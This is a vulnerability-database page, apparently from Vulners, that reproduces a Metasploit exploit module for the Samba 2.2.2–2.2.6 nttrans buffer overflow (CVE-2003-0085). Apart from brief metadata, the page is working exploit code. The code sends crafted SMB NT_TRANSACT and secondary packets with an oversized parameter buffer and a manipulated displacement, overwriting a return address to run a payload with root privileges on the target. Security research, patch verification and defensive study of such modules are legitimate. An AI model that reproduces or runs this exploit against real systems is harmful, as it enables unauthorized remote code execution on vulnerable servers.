Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow

🗓️ 01 Jul 2014 00:00:00Reported by RootType
This module attempts to exploit a buffer overflow vulnerability present in versions 2.2.2 through 2.2.6 of Samba. The bug was discovered and reported by the Debian Samba Maintainers

                                                ##
# $Id: nttrans.rb 9167 2010-04-28 03:54:24Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::SMB

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module attempts to exploit a buffer overflow vulnerability present in
				versions 2.2.2 through 2.2.6 of Samba.

				The Samba developers report this as:
				&#34;Bug in the length checking for encrypted password change requests from clients.&#34;

				The bug was discovered and reported by the Debian Samba Maintainers.
			},
			&#39;Author&#39;         =&#62; [ &#39;hdm&#39; ],
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Version&#39;        =&#62; &#39;$Revision: 9167 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2003-0085&#39; ],
					[ &#39;OSVDB&#39;, &#39;6323&#39; ],
					[ &#39;BID&#39;, &#39;7106&#39; ],
					[ &#39;URL&#39;, &#39;http://www.samba.org/samba/history/samba-2.2.7a.html&#39; ]
				],
			&#39;Privileged&#39;     =&#62; true,
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;    =&#62; 1024,
					&#39;BadChars&#39; =&#62; &#34;\x00&#34;,
					&#39;MinNops&#39;  =&#62; 512,
				},
			&#39;Targets&#39;        =&#62;
				[
					[ &#34;Samba 2.2.x Linux x86&#34;,
						{
							&#39;Arch&#39; =&#62; ARCH_X86,
							&#39;Platform&#39; =&#62; &#39;linux&#39;,
							&#39;Rets&#39; =&#62; [0x01020304, 0x41424344],
						},
					],
				],
			&#39;DisclosureDate&#39; =&#62; &#39;Apr 7 2003&#39;
			))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	def exploit

		# 0x081fc968

		pattern = Rex::Text.pattern_create(12000)

		pattern[532, 4] = [0x81b847c].pack(&#39;V&#39;)
		pattern[836, payload.encoded.length] = payload.encoded

		# 0x081b8138

		connect
		smb_login

		targ_address = 0xfffbb7d0

		#
		# Send a NTTrans request with ParameterCountTotal set to the buffer length
		#

		subcommand   = 1
		param        = &#39;&#39;
		body         = &#39;&#39;
		setup_count  = 0
		setup_data   = &#39;&#39;
		data = param + body

		pkt = CONST::SMB_NTTRANS_PKT.make_struct
		self.simple.client.smb_defaults(pkt[&#39;Payload&#39;][&#39;SMB&#39;])

		base_offset = pkt.to_s.length + (setup_count * 2) - 4
		param_offset = base_offset
		data_offset = param_offset + param.length

		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;Command&#39;] = CONST::SMB_COM_NT_TRANSACT
		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;Flags1&#39;] = 0x18
		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;Flags2&#39;] = 0x2001
		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;WordCount&#39;] = 19 + setup_count

		pkt[&#39;Payload&#39;].v[&#39;ParamCountTotal&#39;] =12000
		pkt[&#39;Payload&#39;].v[&#39;DataCountTotal&#39;] = body.length
		pkt[&#39;Payload&#39;].v[&#39;ParamCountMax&#39;] = 1024
		pkt[&#39;Payload&#39;].v[&#39;DataCountMax&#39;] = 65504
		pkt[&#39;Payload&#39;].v[&#39;ParamCount&#39;] = param.length
		pkt[&#39;Payload&#39;].v[&#39;ParamOffset&#39;] = param_offset
		pkt[&#39;Payload&#39;].v[&#39;DataCount&#39;] = body.length
		pkt[&#39;Payload&#39;].v[&#39;DataOffset&#39;] = data_offset
		pkt[&#39;Payload&#39;].v[&#39;SetupCount&#39;] = setup_count
		pkt[&#39;Payload&#39;].v[&#39;SetupData&#39;] = setup_data
		pkt[&#39;Payload&#39;].v[&#39;Subcommand&#39;] = subcommand

		pkt[&#39;Payload&#39;].v[&#39;Payload&#39;] = data

		self.simple.client.smb_send(pkt.to_s)
		ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)

		#
		# Send a NTTrans secondary request with the magic displacement
		#

		param = pattern
		body  = &#39;&#39;
		data  = param + body

		pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
		self.simple.client.smb_defaults(pkt[&#39;Payload&#39;][&#39;SMB&#39;])

		base_offset = pkt.to_s.length - 4
		param_offset = base_offset
		data_offset = param_offset + param.length

		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;Command&#39;] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;Flags1&#39;] = 0x18
		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;Flags2&#39;] = 0x2001
		pkt[&#39;Payload&#39;][&#39;SMB&#39;].v[&#39;WordCount&#39;] = 18

		pkt[&#39;Payload&#39;].v[&#39;ParamCountTotal&#39;] = param.length
		pkt[&#39;Payload&#39;].v[&#39;DataCountTotal&#39;] = body.length
		pkt[&#39;Payload&#39;].v[&#39;ParamCount&#39;] = param.length
		pkt[&#39;Payload&#39;].v[&#39;ParamOffset&#39;] = param_offset
		pkt[&#39;Payload&#39;].v[&#39;ParamDisplace&#39;] = targ_address
		pkt[&#39;Payload&#39;].v[&#39;DataCount&#39;] = body.length
		pkt[&#39;Payload&#39;].v[&#39;DataOffset&#39;] = data_offset

		pkt[&#39;Payload&#39;].v[&#39;Payload&#39;] = data

		self.simple.client.smb_send(pkt.to_s)
		ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)


		handler

	end

end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1